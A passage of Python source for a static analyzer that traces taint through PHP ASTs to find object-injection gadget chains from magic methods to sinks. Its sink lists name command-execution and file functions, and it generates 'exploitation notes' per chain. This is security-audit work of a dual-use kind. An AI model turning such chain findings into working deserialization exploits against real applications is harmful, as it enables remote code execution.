                
                # Process specific node types
                try:
                    if kind == 'AST_CALL':
                        self._process_call(node, line)
                    elif kind == 'AST_METHOD_CALL':
                        self._process_method_call(node, line)
                    elif kind == 'AST_STATIC_CALL':
                        self._process_static_call(node, line)
                    elif kind == 'AST_NEW':
                        self._process_new(node, line)
                    elif kind == 'AST_PROP':
                        self._process_property_access(node, line)
                    
                    # Check for implicit __toString triggers
                    if kind in ('AST_BINARY_OP', 'AST_ASSIGN_OP', 'AST_ECHO', 'AST_PRINT', 'AST_CAST'):
                        self._process_tostring_trigger(node, line)
                except Exception:
                    # Continue even if processing fails
                    pass
                
                # Add children to stack (limit depth)
                children = node.get('children')
                if isinstance(children, dict):
                    for child in children.values():
                        if isinstance(child, dict):
                            stack.append(child)
                        elif isinstance(child, list):
                            for item in child:
                                if isinstance(item, dict):
                                    stack.append(item)
                elif isinstance(children, list):
                    for child in children:
                        if isinstance(child, dict):
                            stack.append(child)
        
        def _process_call(self, node: Dict, line: int):
            """Process function call"""
            children = node.get('children', {})
            expr = children.get('expr')
            
            func_name = self._get_name(expr)
            variable_call = False
            
            if not func_name:
                func_name = self._get_var_name(expr)
                variable_call = bool(func_name)
                
                # Handle $this->prop() or $obj->prop() style dynamic calls
                if not func_name and isinstance(expr, dict) and expr.get('kind') == 'AST_PROP':
                    prop_children = expr.get('children', {})
                    prop_name = self._get_name(prop_children.get('prop'))
                    var_expr = prop_children.get('expr')
                    var_name = self._get_var_name(var_expr)
                    
                    if prop_name:
                        prefix = "$this->" if var_name == 'this' else (f"${var_name}->" if var_name else "$?->")
                        func_name = f"{prefix}{prop_name}"
                        variable_call = True
            
            if func_name and self.current_class and self.current_method:
                call_site = CallSite(
                    caller_class=self.current_class,
                    caller_method=self.current_method,
                    callee_class=None,
                    callee_method=func_name,
                    call_type='function',
                    line=line
                )
                self.calls.append(call_site)
                
                method_key = f"{self.current_class}::{self.current_method}"
                if method_key in self.methods:
                    self.methods[method_key]['calls'].append({
                        'type': 'function',
                        'name': func_name,
                        'line': line,
                        'variable_call': variable_call
                    })
        
        def _process_method_call(self, node: Dict, line: int):
            """Process method call: $obj->method()"""
            children = node.get('children', {})
            expr = children.get('expr')  # The object
            method_node = children.get('method')
            
            method_name = self._get_name(method_node)
            var_name = self._get_var_name(expr)
            
            if method_name and self.current_class and self.current_method:
                # Determine target class if possible
                target_class = None
                if var_name == 'this':
                    target_class = self.current_class
                
                call_site = CallSite(
                    caller_class=self.current_class,
                    caller_method=self.current_method,
                    callee_class=target_class,
                    callee_method=method_name,
                    call_type='method',
                    line=line,
                    variable=var_name
                )
                self.calls.append(call_site)
                
                method_key = f"{self.current_class}::{self.current_method}"
                if method_key in self.methods:
                    self.methods[method_key]['calls'].append({
                        'type': 'method',
                        'name': method_name,
                        'variable': var_name,
                        'target_class': target_class,
                        'line': line
                    })
        
        def _process_static_call(self, node: Dict, line: int):
            """Process static call: Class::method()"""
            children = node.get('children', {})
            class_node = children.get('class')
            method_node = children.get('method')
            
            class_name = self._get_name(class_node)
            class_name = self._normalize_class_reference(class_name)
            method_name = self._get_name(method_node)
            
            if class_name and method_name and self.current_class and self.current_method:
                call_site = CallSite(
                    caller_class=self.current_class,
                    caller_method=self.current_method,
                    callee_class=class_name,
                    callee_method=method_name,
                    call_type='static',
                    line=line
                )
                self.calls.append(call_site)
                
                method_key = f"{self.current_class}::{self.current_method}"
                if method_key in self.methods:
                    self.methods[method_key]['calls'].append({
                        'type': 'static',
                        'name': method_name,
                        'class': class_name,
                        'line': line
                    })
    
        def _process_new(self, node: Dict, line: int):
            """Process object instantiation"""
            children = node.get('children', {})
            class_node = children.get('class')
            
            # Check if it's a dynamic instantiation: new $var()
            class_name = self._get_name(class_node)
            variable_new = False
            
            if not class_name:
                class_name = self._get_var_name(class_node)
                variable_new = bool(class_name)
            
            if variable_new and self.current_class and self.current_method:
                 method_key = f"{self.current_class}::{self.current_method}"
                 if method_key in self.methods:
                    self.methods[method_key]['calls'].append({
                        'type': 'new',
                        'name': class_name,
                        'line': line,
                        'variable_call': True
                    })
        
        def _process_property_access(self, node: Dict, line: int):
            """Process property access: $obj->prop"""
            children = node.get('children', {})
            expr = children.get('expr')
            prop_node = children.get('prop')
            
            var_name = self._get_var_name(expr)
            prop_name = self._get_name(prop_node)
            
            if prop_name and self.current_class and self.current_method:
                access = PropertyAccess(
                    class_name=self.current_class,
                    method_name=self.current_method,
                    property_name=prop_name,
                    access_type='read',
                    line=line
                )
                self.property_accesses.append(access)
                
                method_key = f"{self.current_class}::{self.current_method}"
                if method_key in self.methods:
                    self.methods[method_key]['property_accesses'].append({
                        'name': prop_name,
                        'variable': var_name,
                        'line': line
                    })
        
        def _process_tostring_trigger(self, node: Dict, line: int):
            """Handle implicit __toString triggers like echo, print, concat"""
            kind = node.get('kind')
            children = node.get('children', {})
            flags = node.get('flags', 0)
            
            candidates = []
            
            if kind == 'AST_BINARY_OP' and flags == 8: # BINARY_CONCAT
                candidates.append(children.get('left'))
                candidates.append(children.get('right'))
            elif kind == 'AST_ASSIGN_OP' and flags == 264: # ASSIGN_CONCAT
                candidates.append(children.get('var'))
                candidates.append(children.get('expr'))
            elif kind == 'AST_ECHO':
                 if isinstance(children, dict):
                     candidates.append(children)
                 elif isinstance(children, list):
                     candidates.extend(children)
            elif kind == 'AST_PRINT':
                 candidates.append(children.get('expr'))
            elif kind == 'AST_CAST' and flags == 2: # TYPE_STRING
                 candidates.append(children.get('expr'))
                 
            for candidate in candidates:
                if not isinstance(candidate, dict):
                    continue
                    
                var_name = self._get_var_name(candidate)
                target_class = None
                if var_name == 'this':
                    target_class = self.current_class
                
                # Identify property access if possible for better reporting
                prop_name = None
                if candidate.get('kind') == 'AST_PROP':
                    prop_children = candidate.get('children', {})
                    name_node = prop_children.get('prop')
                    prop_name = self._get_name(name_node)
                    
                if self.current_class and self.current_method:
                    call_site = CallSite(
                        caller_class=self.current_class,
                        caller_method=self.current_method,
                        callee_class=target_class,
                        callee_method='__toString',
                        call_type='method',
                        line=line,
                        variable=var_name
                    )
                    self.calls.append(call_site)
                    
                    method_key = f"{self.current_class}::{self.current_method}"
                    if method_key in self.methods:
                        entry = {
                            'type': 'method',
                            'name': '__toString',
                            'variable': var_name,
                            'target_class': target_class,
                            'line': line,
                            'implicit': True
                        }
                        self.methods[method_key]['calls'].append(entry)
    
        def _extract_params(self, params_node: Dict) -> List[str]:
            """Extract parameter names from AST_PARAM_LIST"""
            if not params_node:
                return []
            
            params = []
            children = params_node.get('children')
            
            if isinstance(children, list):
                for param in children:
                    if isinstance(param, dict):
                        name_node = param.get('children', {}).get('name')
                        param_name = self._get_name(name_node)
                        if param_name:
                            params.append(param_name)
            
            return params
        
        def _get_name(self, node: Any) -> Optional[str]:
            """Extract name from various node types - with recursion protection"""
            if node is None:
                return None
            
            if isinstance(node, str):
                return node
            
            if not isinstance(node, dict):
                return None
            
            # Avoid infinite recursion
            max_depth = 5
            depth = 0
            current = node
            
            while depth < max_depth:
                if not isinstance(current, dict):
                    break
                
                kind = current.get('kind')
                children = current.get('children', {})
                
                if kind == 'AST_VAR':
                    return None
                
                if kind == 'AST_NAME':
                    return children.get('name')
                elif 'name' in children:
                    name_val = children.get('name')
                    if isinstance(name_val, str):
                        return name_val
                    elif isinstance(name_val, dict):
                        current = name_val
                        depth += 1
                    else:
                        return None
                else:
                    return None
            
            return None
        
        def _get_var_name(self, node: Any) -> Optional[str]:
            """Extract variable name from VAR node - with recursion protection"""
            if not isinstance(node, dict):
                return None
            
            kind = node.get('kind')
            children = node.get('children', {})
            
            if kind == 'AST_VAR':
                name_node = children.get('name')
                if isinstance(name_node, str):
                    return name_node
                return self._get_name(name_node)
            
            return None
    
        def _extract_name_list(self, node: Any) -> List[str]:
            """Extract a list of names from AST_NAME_LIST or similar structures"""
            names: List[str] = []
            
            if node is None:
                return names
            
            if isinstance(node, list):
                for child in node:
                    names.extend(self._extract_name_list(child))
                return names
            
            if isinstance(node, str):
                names.append(node)
                return names
            
            if not isinstance(node, dict):
                return names
            
            kind = node.get('kind')
            children = node.get('children', [])
            
            if kind == 'AST_NAME_LIST' and isinstance(children, list):
                for child in children:
                    name = self._get_name(child)
                    if name:
                        names.append(name)
            else:
                name = self._get_name(node)
                if name:
                    names.append(name)
            
            return names
    
        def _normalize_class_reference(self, class_name: Optional[str]) -> Optional[str]:
            """Normalize class references like self/static/parent to concrete names"""
            if not class_name:
                return None
            
            lowered = class_name.lower()
            
            if lowered in {'self', 'static'}:
                return self.current_class
            
            if lowered == 'parent':
                if self.current_class and self.current_class in self.classes:
                    return self.classes[self.current_class].get('parent')
                return None
            
            return class_name
    
        def resolve_method_in_hierarchy(self, class_name: Optional[str], method_name: str) -> Optional[str]:
            """Resolve a method by searching a class and its ancestors"""
            if not class_name or not method_name:
                return None
            
            visited: Set[str] = set()
            current = class_name
            
            while current and current not in visited:
                visited.add(current)
                method_key = f"{current}::{method_name}"
                if method_key in self.methods:
                    return method_key
                
                class_data = self.classes.get(current)
                current = class_data.get('parent') if class_data else None
            
            return None
    
        def find_method_by_name(self, method_name: str) -> Optional[str]:
            """Find the first method matching the provided name anywhere"""
            if not method_name:
                return None
            
            for method_key in self.methods:
                if method_key.endswith(f"::{method_name}"):
                    return method_key
            
            return None
    
        def get_class_lineage(self, class_name: Optional[str]) -> List[str]:
            """Return ordered list of class and its ancestors"""
            lineage: List[str] = []
            if not class_name:
                return lineage
            
            visited: Set[str] = set()
            current = class_name
            
            while current and current not in visited:
                lineage.append(current)
                visited.add(current)
                class_data = self.classes.get(current)
                current = class_data.get('parent') if class_data else None
            
            return lineage
    
    
    class AdvancedTaintAnalyzer:
        """Multi-level taint analyzer with object injection detection"""
        
        SINKS = {
            'rce': {'eval', 'system', 'exec', 'passthru', 'shell_exec', 'popen',
                    'proc_open', 'pcntl_exec', 'create_function', '`'},
            'file_ops': {'file_put_contents', 'fopen', 'file_get_contents', 'fwrite',
                         'unlink', 'rmdir', 'rename', 'copy', 'move_uploaded_file', 'fread'},
            'code_inclusion': {'include', 'require', 'include_once', 'require_once'},
            'reflection': {'call_user_func', 'call_user_func_array', 'call_user_method',
                          'forward_static_call', 'ReflectionFunction', 'ReflectionMethod'},
            'sql': {'mysql_query', 'mysqli_query', 'pg_query', 'sqlite_query', 'query'},
            'command': {'shell_exec', 'proc_open', 'popen', 'passthru'}
        }
        
        MAGIC_METHODS = {
            '__destruct', '__call', '__callStatic', '__get',
            '__set', '__isset', '__unset', '__sleep', '__wakeup', '__toString',
            '__invoke', '__set_state', '__clone', '__debugInfo', '__serialize',
            '__unserialize', 'offsetGet'
        }
        
        SAFE_PHP_FUNCTIONS = {
            # Strings
            # 'strlen', 'strpos', 'strrpos', 'substr', 'str_replace', 'str_repeat', 
            # 'strtoupper', 'strtolower', 'trim', 'rtrim', 'ltrim', 'implode', 'explode', 
            # 'sprintf', 'vsprintf', 'addslashes', 'stripslashes', 'htmlspecialchars', 
            # 'htmlentities', 'urlencode', 'urldecode', 'base64_encode', 'base64_decode', 
            # 'json_encode', 'json_decode', 'serialize', 'unserialize', 'nl2br', 'chop',
            # 'chr', 'ord', 'str_split', 'str_word_count', 'strcmp', 'strcasecmp',
            # 'ucfirst', 'ucwords', 'md5', 'sha1', 'hash', 'crc32', 'lcfirst', 'number_format',
            # 'str_pad', 'str_shuffle', 'strrev', 'strstr', 'strtok', 'wordwrap',
            
            # Arrays
            # 'count', 'sizeof', 'array_key_exists', 'array_keys', 'array_values', 
            # 'array_map', 'array_filter', 'array_merge', 'array_pop', 'array_push', 
            # 'array_shift', 'array_unshift', 'array_slice', 'array_splice', 'in_array', 
            # 'compact', 'extract', 'range', 'sort', 'rsort', 'asort', 'arsort', 
            # 'ksort', 'krsort', 'usort', 'uasort', 'uksort', 'shuffle', 'array_flip',
            # 'array_reverse', 'array_search', 'array_sum', 'array_unique', 'array_combine',
            # 'array_chunk', 'array_column', 'array_count_values', 'array_diff',
            # 'array_diff_assoc', 'array_diff_key', 'array_fill', 'array_fill_keys',
            # 'array_intersect', 'array_intersect_assoc', 'array_intersect_key',
            # 'array_multisort', 'array_pad', 'array_product', 'array_rand',
            # 'array_replace', 'array_replace_recursive', 'array_walk', 'array_walk_recursive',
            # 'current', 'each', 'end', 'key', 'list', 'next', 'pos', 'prev', 'reset',
            
            # Types/Validation
            # 'is_array', 'is_bool', 'is_callable', 'is_double', 'is_float', 'is_int',
            # 'is_integer', 'is_long', 'is_null', 'is_numeric', 'is_object', 'is_real',
            # 'is_resource', 'is_scalar', 'is_string', 'isset', 'empty', 'defined',
            # 'intval', 'floatval', 'strval', 'boolval', 'gettype', 'settype',
            # 'is_countable', 'is_iterable',
            
            # Objects/Classes
            # 'function_exists', 'class_exists', 'method_exists', 'property_exists',
            # 'is_a', 'is_subclass_of', 'get_class', 'get_called_class', 'get_parent_class',
            # 'get_object_vars', 'get_class_methods', 'get_class_vars', 'trait_exists',
            # 'interface_exists',
            
            # Date/Time
            # 'date', 'time', 'strtotime', 'microtime', 'mktime', 'gmdate', 'idate',
            # 'checkdate', 'date_create', 'date_format', 'date_diff', 'date_add',
            # 'date_sub', 'date_interval_create_from_date_string', 'getdate',
            
            # File/Path (Non-destructive/Non-reading content)
            'dirname', 'basename', 'pathinfo', 'file_exists', 'is_dir', 'is_file',
            'is_readable', 'is_writable', 'is_executable', 'is_link', 'stat',
            'filesize', 'filemtime', 'filectime', 'fileatime', 'glob', 'disk_free_space',
            'disk_total_space', 'getcwd', 'realpath',
            
            # Math
            # 'abs', 'ceil', 'floor', 'round', 'max', 'min', 'rand', 'mt_rand',
            # 'sqrt', 'pow', 'exp', 'log', 'sin', 'cos', 'tan', 'pi', 'bindec',
            # 'decbin', 'dechex', 'hexdec', 'octdec', 'decoct', 'fmod', 'hypot',
            # 'is_finite', 'is_infinite', 'is_nan', 'lcg_value',
            
            # Output/Control
            # 'header', 'setcookie', 'die', 'exit', 'define', 'constant', 
            # 'error_log', 'trigger_error', 'debug_backtrace', 'print_r', 'var_dump',
            # 'var_export', 'printf', 'vprintf', 'sleep', 'usleep',
            
            # Regex
            # 'preg_match', 'preg_match_all', 'preg_replace', 'preg_split', 'preg_quote',
            # 'preg_grep', 'preg_replace_callback',
            
            # Misc
            # 'version_compare', 'extension_loaded', 'phpversion', 'ini_get', 'getenv',
            # 'putenv', 'set_time_limit', 'ignore_user_abort', 'uniqid',
            # 'get_defined_constants', 'get_defined_functions', 'get_defined_vars',
            # 'get_included_files', 'get_required_files', 'memory_get_usage',
            # 'memory_get_peak_usage', 'register_shutdown_function'
        }
    
        ENTRY_POINTS = {'__wakeup', '__destruct', '__toString', '__unserialize', 'offsetGet'}
        
        def __init__(self, walker: ASTWalker):
            self.walker = walker
            self.taint_sources: List[TaintSource] = []
            self.taint_sinks: List[TaintSink] = []
            self.tainted_properties: Dict[str, Set[str]] = defaultdict(set)
            self.tainted_methods: Dict[str, float] = {}
            self.call_graph: Dict[str, List[CallSite]] = defaultdict(list)
            self.sinks_normalized = {
                category: {func.lower() for func in functions}
                for category, functions in self.SINKS.items()
            }
            # Add patterns for dynamic calls with multiple arguments (potential RCE via call_user_func etc)
            # but also simple variable function calls like $k($v)
            
        def analyze(self, stream_output: bool = True) -> List[GadgetChain]:
            """Perform comprehensive taint analysis with optional streaming output"""
            if stream_output:
                print("\n" + "="*100)
                print(" 🔍 LIVE GADGET CHAIN DETECTION")
                print("="*100 + "\n")
            
            print("  [1/6] Identifying taint sources...")
            self._identify_taint_sources()
            print(f"        ✓ Found {len(self.taint_sources)} taint sources")
            
            print("  [2/6] Identifying dangerous sinks...")
            self._identify_sinks()
            print(f"        ✓ Found {len(self.taint_sinks)} dangerous sinks")
            
            print("  [3/6] Building call graph...")
            self._build_call_graph()
            print(f"        ✓ Built call graph with {len(self.call_graph)} nodes")
            
            print("  [4/6] Propagating taint (multi-level)...")
            self._propagate_taint_multi_level()
            
            print("  [5/6] Analyzing object injection points...")
            injectable = self._analyze_injectable_objects()
            print(f"        ✓ Found {len(injectable)} injectable classes")
            
            print("  [6/6] Detecting exploitable gadget chains...")
            if stream_output:
                print("\n" + "-"*100)
                print(" 🎯 DETECTED CHAINS (streaming results)")
                print("-"*100 + "\n")
            
            chains = self._detect_gadget_chains_streaming(injectable, stream_output)
            
            if stream_output:
                print("\n" + "="*100)
                print(f" ✅ ANALYSIS COMPLETE: {len(chains)} total chains detected")
                print("="*100 + "\n")
            
            return chains
        
        def _identify_taint_sources(self):
            """Identify taint sources from magic methods and properties"""
            for method_key, method_data in self.walker.methods.items():
                method_name = method_data['name']
                
                if not method_data['is_magic'] and method_name not in self.ENTRY_POINTS:
                    continue
                
                class_name = method_data['class']
                
                confidence = 0.95 if method_name in self.ENTRY_POINTS else 0.7
                
                # Properties accessed in magic methods are tainted
                for prop_access in method_data.get('property_accesses', []):
                    prop_name = prop_access['name']
                    self.tainted_properties[class_name].add(prop_name)
                    
                    source = TaintSource(
                        name=f"Property in {method_name}",
                        class_name=class_name,
                        method_name=method_name,
                        variable=f"$this->{prop_name}",
                        location=method_key,
                        source_type='property',
                        confidence=confidence
                    )
                    self.taint_sources.append(source)
                
                # Mark magic method itself as tainted
                self.tainted_methods[method_key] = confidence
        
        def _identify_sinks(self):
            """Identify all dangerous sinks"""
            for method_key, method_data in self.walker.methods.items():
                for call_info in method_data.get('calls', []):
                    if call_info.get('type') != 'function':
                        continue
    
                    func_name = (call_info.get('name') or '').strip()
                    
                    if not func_name:
                        continue
                    
                    func_name_lower = func_name.lower()
                    
                    # Check if it's a dangerous function
                    for category, functions in self.sinks_normalized.items():
                        if func_name_lower in functions:
                            severity = self._get_severity(category)
                            
                            sink = TaintSink(
                                name=f"{category} sink",
                                class_name=method_data['class'],
                                method_name=method_data['name'],
                                filepath=method_data.get('filepath', ''),
                                location=method_key,
                                function=func_name,
                                severity=severity,
                                line=call_info.get('line', 0)
                            )
                            self.taint_sinks.append(sink)
                    
                    # Check for unknown/suspicious functions
                    if call_info.get('type') == 'function' and not call_info.get('variable_call'):
                        if func_name_lower not in self.SAFE_PHP_FUNCTIONS:
                            # If it's not a known sink and not a safe function, treat as suspicious
                            # We skip if it's a known sink (already handled above)
                            is_known_sink = False
                            for functions in self.sinks_normalized.values():
                                if func_name_lower in functions:
                                    is_known_sink = True
                                    break
                            
                            if not is_known_sink:
                                sink = TaintSink(
                                    name="Suspicious Function",
                                    class_name=method_data['class'],
                                    method_name=method_data['name'],
                                    filepath=method_data.get('filepath', ''),
                                    location=method_key,
                                    function=func_name,
                                    severity=TaintLevel.LOW,
                                    line=call_info.get('line', 0)
                                )
                                self.taint_sinks.append(sink)
                    
                    # Check for variable function calls or dynamic instantiation
                    if (call_info.get('type') == 'function' or call_info.get('type') == 'new') and call_info.get('variable_call'):
                        func_name_sink = call_info.get('name')
                        is_new = call_info.get('type') == 'new'
                        display_name = f"new ${func_name_sink}(...)" if is_new else f"${func_name_sink}(...)"
                        sink_name = "Dynamic Instantiation" if is_new else "Dynamic Variable Call"
                        
                        sink = TaintSink(
                            name=sink_name,
                            class_name=method_data['class'],
                            method_name=method_data['name'],
                            filepath=method_data.get('filepath', ''),
                            location=method_key,
                            function=display_name,
                            severity=TaintLevel.CRITICAL,
                            line=call_info.get('line', 0)
                        )
                        self.taint_sinks.append(sink)
        
        def _get_severity(self, category: str) -> TaintLevel:
            """Map sink category to severity"""
            severity_map = {
                'rce': TaintLevel.CRITICAL,
                'code_inclusion': TaintLevel.CRITICAL,
                'deserialization': TaintLevel.CRITICAL,
                'command': TaintLevel.CRITICAL,
                'file_ops': TaintLevel.HIGH,
                'reflection': TaintLevel.HIGH,
                'sql': TaintLevel.HIGH
            }
            return severity_map.get(category, TaintLevel.MEDIUM)
        
        def _build_call_graph(self):
            """Build comprehensive call graph"""
            for call_site in self.walker.calls:
                caller_key = f"{call_site.caller_class}::{call_site.caller_method}"
                self.call_graph[caller_key].append(call_site)
        
        def _propagate_taint_multi_level(self):
            """Multi-level taint propagation"""
            max_iterations = 10
            iteration = 0
            
            while iteration < max_iterations:
                changed = False
                iteration += 1
                
                for method_key, method_data in self.walker.methods.items():
                    class_name = method_data['class']
                    
                    # If method accesses tainted properties, mark it as tainted
                    for prop_access in method_data.get('property_accesses', []):
                        prop_name = prop_access['name']
                        if prop_name in self.tainted_properties[class_name]:
                            if method_key not in self.tainted_methods:
                                self.tainted_methods[method_key] = 0.8
                                changed = True
                    
                    # Propagate taint through calls
                    if method_key in self.tainted_methods:
                        for call_site in self.call_graph.get(method_key, []):
                            # Find the called method
                            callee_key = None
                            if call_site.callee_class:
                                callee_key = self.walker.resolve_method_in_hierarchy(
                                    call_site.callee_class,
                                    call_site.callee_method
                                )
                            else:
                                # Try to resolve the method
                                callee_key = self._resolve_method(
                                    call_site.callee_method,
                                    call_site.variable,
                                    class_name
                                )
                            
                            if callee_key and callee_key in self.walker.methods:
                                if callee_key not in self.tainted_methods:
                                    # Propagate with reduced confidence
                                    confidence = self.tainted_methods[method_key] * 0.9
                                    self.tainted_methods[callee_key] = confidence
                                    changed = True
                            else:
                                # Try fallback to __call or implicit __invoke
                                fallback_key = None
                                
                                # 1. __call fallback (if method call and not found)
                                if call_site.call_type == 'method' and call_site.callee_class:
                                    fallback_key = self.walker.resolve_method_in_hierarchy(
                                        call_site.callee_class, '__call'
                                    )
                                
                                # 2. __invoke fallback (if variable call)
                                # Only if variable_call is marked in method data (not just call_site, which doesn't have it directly unless we look it up)
                                # We can check call_site type or if resolve failed for variable call
                                if not fallback_key and call_site.call_type == 'function':
                                    # It's a function call, maybe variable function?
                                    # We need to check if it was a variable call. CallSite has 'variable' field? No, 'callee_method' has name.
                                    # Wait, _process_call sets 'variable_call' in calls dict, but CallSite object only has names.
                                    # However, if callee_method is a variable name (starts with $? no it holds the name).
                                    # Actually _process_call sets callee_method=var_name if implicit.
                                    # If we assume any unresolved variable function call could be __invoke:
                                    # We check if we can find ANY class with __invoke that is relevant?
                                    # Without type inference, we might just check if any class has __invoke. 
                                    # That is too broad. 
                                    # But if we have object injection context, maybe we assume valid object?
                                    # For now, let's skip __invoke global search to avoid massive FPs, unless we track variable types.
                                    pass
    
                                if fallback_key and fallback_key in self.walker.methods:
                                    if fallback_key not in self.tainted_methods:
                                        confidence = self.tainted_methods[method_key] * 0.85
                                        self.tainted_methods[fallback_key] = confidence
                                        changed = True
                
                if not changed:
                    break
            
            print(f"    ✓ Taint propagated through {iteration} iterations")
            print(f"    ✓ Found {len(self.tainted_methods)} tainted methods")
        
        def _resolve_method(self, method_name: str, variable: Optional[str], current_class: str) -> Optional[str]:
            """Resolve method call to actual method key"""
            if not method_name:
                return None
            
            if variable == 'this':
                method_key = self.walker.resolve_method_in_hierarchy(current_class, method_name)
                if method_key:
                    return method_key
            
            return self.walker.find_method_by_name(method_name)
    
        def _class_has_entry_point(self, class_name: str) -> bool:
            """Determine if a class (or its ancestors) exposes an entry point"""
            for entry in self.ENTRY_POINTS:
                if self.walker.resolve_method_in_hierarchy(class_name, entry):
                    return True
            return False
    
        def _collect_injectable_properties(self, class_name: str) -> List[str]:
            """Collect unique property names accessed across class hierarchy"""
            props: List[str] = []
            seen: Set[str] = set()
            
            for lineage_class in self.walker.get_class_lineage(class_name):
                class_data = self.walker.classes.get(lineage_class)
                if not class_data:
                    continue
                
                for method_data in class_data['methods'].values():
                    for prop_access in method_data.get('property_accesses', []):
                        prop_name = prop_access['name']
                        if prop_name and prop_name not in seen:
                            seen.add(prop_name)
                            props.append(prop_name)
            
            return props
        
        def _analyze_injectable_objects(self) -> Dict[str, List[str]]:
            """Analyze which objects can be injected to trigger chains"""
            injectable = {}
            
            for class_name in self.walker.classes.keys():
                if not self._class_has_entry_point(class_name):
                    continue
                
                props = self._collect_injectable_properties(class_name)
                injectable[class_name] = props
            
            return injectable
        
        def _detect_gadget_chains_streaming(self, injectable: Dict[str, List[str]], 
                                            stream_output: bool = True) -> List[GadgetChain]:
            """Detect exploitable gadget chains and stream results as found"""
            chains = []
            chain_id = 1
            
            # Group sources by entry point for better progress tracking
            sources_by_entry = defaultdict(list)
            for source in self.taint_sources:
                if source.source_type == 'property':
                    sources_by_entry[source.location].append(source)
            
            total_entries = len(sources_by_entry)
            processed = 0
            
            # Find all paths from tainted methods to sinks
            for entry_method, sources in sources_by_entry.items():
                processed += 1
                
                if stream_output and processed % 5 == 0:
                    print(f"    ... scanning entry point {processed}/{total_entries}")
                
                # Find paths to sinks
                paths = self._find_paths_bfs(entry_method, max_depth=6)
                
                for path_data in paths:
                    path, sink = path_data['path'], path_data['sink']
                    
                    # Determine injectable objects for this chain
                    chain_injectable = []
                    for step in path:
                        method = step.get('method', '')
                        class_name = method.split('::')[0] if '::' in method else ''
                        
                        if class_name in injectable:
                            chain_injectable.append({
                                'class': class_name,
                                'properties': injectable[class_name]
                            })
                    
                    # Calculate confidence
                    confidence = self._calculate_confidence(path, sink, chain_injectable)
                    
                    # Filter low confidence chains early
                    if confidence < 0.4:
                        continue
                    
                    # Generate exploitation notes
                    exploit_notes = self._generate_exploit_notes(path, sink, chain_injectable)
                    
                    chain = GadgetChain(
                        chain_id=chain_id,
                        entry_points=[entry_method],
                        chain_path=path,
                        sink=sink,
                        severity=sink.severity,
                        confidence=confidence,
                        description=self._generate_description(path, sink),
                        injectable_objects=chain_injectable,
                        exploitation_notes=exploit_notes
                    )
                    chains.append(chain)
                    
                    # Stream output for this chain
                    if stream_output:
                        self._print_chain_summary(chain)
                    
                    chain_id += 1
            
            return chains
        
        def _print_chain_summary(self, chain: GadgetChain):
            """Print a summary of detected chain immediately"""
            severity_emoji = {
                TaintLevel.CRITICAL: "🔴",
                TaintLevel.HIGH: "🟠",
                TaintLevel.MEDIUM: "🟡",
                TaintLevel.LOW: "🟢"
            }
            
            emoji = severity_emoji.get(chain.severity, "⚪")
            
            print(f"{emoji} CHAIN #{chain.chain_id} [{chain.severity.name}] Confidence: {chain.confidence:.0%}")
            
            # Show short path
            preview_steps = []
            for step in chain.chain_path[:4]:
                method = step.get('method', '?')
                method_file = step.get('method_file') or 'Unknown file'
                method_line = step.get('method_line', 0)
                location = f"{method_file}:{method_line}" if method_line else method_file
                preview_steps.append(f"{method} ({location})")
            if len(chain.chain_path) > 4:
                preview_steps.append("...")
            path_str = " → ".join(preview_steps)
            
            print(f"   Path: {path_str}")
            sink_path = chain.sink.filepath or 'Unknown file'
            print(f"   Sink: {chain.sink.function}() at {sink_path}:{chain.sink.line}")
            
            if chain.injectable_objects:
                classes = [obj['class'] for obj in chain.injectable_objects[:2]]
                print(f"   Injectable: {', '.join(classes)}")
            
            print()
        
        def _find_paths_bfs(self, start_method: str, max_depth: int = 6) -> List[Dict]:
            """Find paths from start to sinks using BFS - optimized version"""
            paths = []
            start_step = self._create_path_step(start_method, step_type='entry')
            queue = deque([(start_method, [start_step], 0)])
            visited = set()
            
            # Early termination if we find enough paths
            max_paths_per_entry = 10
            
            while queue and len(paths) < max_paths_per_entry:
                current, path, depth = queue.popleft()
                
                if depth > max_depth:
                    continue
                
                state_key = (current, tuple(p['method'] for p in path))
                if state_key in visited:
                    continue
                visited.add(state_key)
                
                # Check if current method contains sinks
                for sink in self.taint_sinks:
                    sink_method = f"{sink.class_name}::{sink.method_name}"
                    if sink_method == current:
                        # Verify taint reaches sink
                        if self._verify_taint_flow(path):
                            paths.append({'path': path.copy(), 'sink': sink})
                            # Continue searching for more paths
                
                # Don't expand too much if we already have paths from this entry
                if len(paths) >= max_paths_per_entry:
                    break
                
                # Follow calls
                for call_site in self.call_graph.get(current, []):
                    if call_site.callee_class:
                        next_method = self.walker.resolve_method_in_hierarchy(
                            call_site.callee_class,
                            call_site.callee_method
                        )
                    else:
                        next_method = self._resolve_method(
                            call_site.callee_method,
                            call_site.variable,
                            call_site.caller_class
                        )
                    
                    if next_method and next_method in self.walker.methods:
                        # Avoid revisiting in this path
                        if any(step['method'] == next_method for step in path):
                            continue
                        
                        new_step = self._create_path_step(
                            next_method,
                            step_type='call',
                            call_type=call_site.call_type,
                            caller_method=current,
                            call_line=call_site.line
                        )
                        new_path = path + [new_step]
                        queue.append((next_method, new_path, depth + 1))
            
            return paths
        
        def _create_path_step(
            self,
            method_name: str,
            step_type: str,
            call_type: Optional[str] = None,
            caller_method: Optional[str] = None,
            call_line: Optional[int] = None
        ) -> Dict[str, Any]:
            """Build a standardized path step with metadata"""
            method_info = self.walker.methods.get(method_name, {})
            class_name = method_name.split('::')[0] if '::' in method_name else ''
            method_file = method_info.get('filepath', '')
            method_line = method_info.get('line', 0)
            
            caller_info = self.walker.methods.get(caller_method, {}) if caller_method else {}
            
            return {
                'method': method_name,
                'class': class_name,
                'type': step_type,
                'call_type': call_type or ('entry' if step_type == 'entry' else ''),
                'method_file': method_file,
                'method_line': method_line,
                'line': call_line if call_line is not None else method_line,
                'call_line': call_line if call_line is not None else 0,
                'call_file': caller_info.get('filepath', ''),
            }
        
        def _verify_taint_flow(self, path: List[Dict]) -> bool:
            """Verify that taint flows through the path"""
            for step in path:
                method = step.get('method', '')
                if method in self.tainted_methods:
                    return True
            return False
        
        def _calculate_confidence(self, path: List[Dict], sink: TaintSink, 
                                injectable: List[Dict]) -> float:
            """Calculate confidence score"""
            base = 0.6
            
            # Shorter chains are more reliable
            length_factor = max(0.3, 1.0 - (len(path) - 1) * 0.12)
            
            # Entry point significance
            entry = path[0].get('method', '')
            entry_factor = 1.3 if any(ep in entry for ep in self.ENTRY_POINTS) else 1.0
            
            # Severity factor
            severity_map = {
                TaintLevel.CRITICAL: 1.0,
                TaintLevel.HIGH: 0.85,
                TaintLevel.MEDIUM: 0.7,
                TaintLevel.LOW: 0.5
            }
